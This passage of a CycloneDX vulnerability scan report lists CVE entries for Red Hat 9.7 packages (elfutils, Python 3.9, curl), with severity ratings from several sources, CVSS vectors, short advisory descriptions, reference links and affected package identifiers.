          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-1376",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        404
      ],
      "description": "A vulnerability classified as problematic was found in GNU elfutils 0.192. This vulnerability affects the function elf_strptr in the library /libelf/elf_strptr.c of the component eu-strip. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is b16f441cca0a4841050e3215a9f120a6d8aea918. It is recommended to apply a patch to fix this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1376"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1376"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1376"
        },
        {
          "url": "https://sourceware.org/bugzilla/attachment.cgi?id=15940"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32672"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32672#c3"
        },
        {
          "url": "https://vuldb.com/?ctiid.295984"
        },
        {
          "url": "https://vuldb.com/?id.295984"
        },
        {
          "url": "https://vuldb.com/?submit.497538"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1376"
        },
        {
          "url": "https://www.gnu.org/"
        }
      ],
      "published": "2025-02-17T05:15:09+00:00",
      "updated": "2025-11-04T20:21:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.193-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.193-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.193-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-1377",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        404
      ],
      "description": "A vulnerability, which was classified as problematic, has been found in GNU elfutils 0.192. This issue affects the function gelf_getsymshndx of the file strip.c of the component eu-strip. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of the patch is fbf1df9ca286de3323ae541973b08449f8d03aba. It is recommended to apply a patch to fix this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1377"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1377"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1377"
        },
        {
          "url": "https://sourceware.org/bugzilla/attachment.cgi?id=15941"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32673"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32673#c2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7369-1"
        },
        {
          "url": "https://vuldb.com/?ctiid.295985"
        },
        {
          "url": "https://vuldb.com/?id.295985"
        },
        {
          "url": "https://vuldb.com/?submit.497539"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1377"
        },
        {
          "url": "https://www.gnu.org/"
        }
      ],
      "published": "2025-02-17T05:15:10+00:00",
      "updated": "2025-11-04T20:26:20+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.193-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.193-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.193-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-13837",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "When loading a plist file, the plistlib module reads data of the size specified by the file itself, meaning a malicious file can cause OOM and DoS issues.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13837"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13837"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/568342cfc8f002d9a15f30238f26b9d2e0e79036"
        },
        {
          "url": "https://github.com/python/cpython/commit/5a8b19677d818fb41ee55f310233772e15aa1a2b"
        },
        {
          "url": "https://github.com/python/cpython/commit/694922cf40aa3a28f898b5f5ee08b71b4922df70"
        },
        {
          "url": "https://github.com/python/cpython/commit/71fa8eb8233b37f16c88b6e3e583b461b205d1ba"
        },
        {
          "url": "https://github.com/python/cpython/commit/b64441e4852383645af5b435411a6f849dd1b4cb"
        },
        {
          "url": "https://github.com/python/cpython/commit/cefee7d118a26ef6cd43db59bb9d98ca9a331111"
        },
        {
          "url": "https://github.com/python/cpython/issues/119342"
        },
        {
          "url": "https://github.com/python/cpython/pull/119343"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-13837.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/2X5IBCJXRQAZ5PSERLHMSJFBHFR3QM2C/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13837"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13837"
        }
      ],
      "published": "2025-12-01T18:16:04+00:00",
      "updated": "2026-03-03T15:16:14+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-14017",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl,\nchanging TLS options in one thread would inadvertently change them globally\nand therefore possibly also affect other concurrently setup transfers.\n\nDisabling certificate verification for a specific transfer could\nunintentionally disable the feature for other threads as well.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14017"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14017"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14017.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14017.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-jh4h-2cg6-889h"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14017"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14017"
        }
      ],
      "published": "2026-01-08T10:15:45+00:00",
      "updated": "2026-01-27T21:29:39+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
